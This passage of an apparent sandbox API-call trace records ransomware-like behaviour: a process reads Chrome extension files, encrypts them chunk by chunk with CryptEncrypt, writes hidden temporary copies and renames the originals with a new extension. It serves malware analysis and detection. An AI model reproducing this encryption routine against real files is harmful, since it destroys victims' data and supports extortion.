lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.271] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.271] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.271] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.271] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.271] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.271] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.271] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.271] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.272] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.272] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.272] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.272] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.272] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.272] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.273] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.273] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.273] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.273] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.273] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.273] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.274] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.274] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.274] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.274] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.274] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.274] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.274] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.274] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.274] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.274] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.274] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.274] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.274] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.275] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.275] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.275] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.275] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.275] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.275] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.275] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.275] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.275] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.275] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.275] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.275] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.275] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.276] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.276] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.276] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.276] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.276] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.276] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.276] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.276] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.276] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.276] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.276] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.276] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.276] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.277] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.277] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.277] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.277] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.277] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.277] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.277] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.277] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.277] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.277] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.277] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.277] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.277] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.278] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.278] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.278] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.278] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.278] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.278] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.279] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.279] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.279] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.279] CryptEncrypt (in: hKey=0x2e7fc40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0262.279] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0262.293] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js"), bFailIfExists=0) returned 1 [0262.312] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js", dwFileAttributes=0x0) returned 1 [0262.313] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.gsg")) returned 1 [0262.317] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_hangouts.js.fuck")) returned 1 [0262.318] CryptDestroyHash (hHash=0x2e7fc00) returned 1 [0262.318] CryptDestroyKey (hKey=0x2e7fc40) returned 1 [0262.318] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0262.318] FindNextFileA (in: hFindFile=0x2e7fbc0, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0262.318] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0262.318] GetLastError () returned 0x0 [0262.319] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js")) returned 0x20 [0262.319] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js", dwFileAttributes=0x80) returned 1 [0262.319] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0262.320] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0262.320] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\mirroring_webrtc.js.gsg", dwFileAttributes=0x2) returned 1 [0262.320] 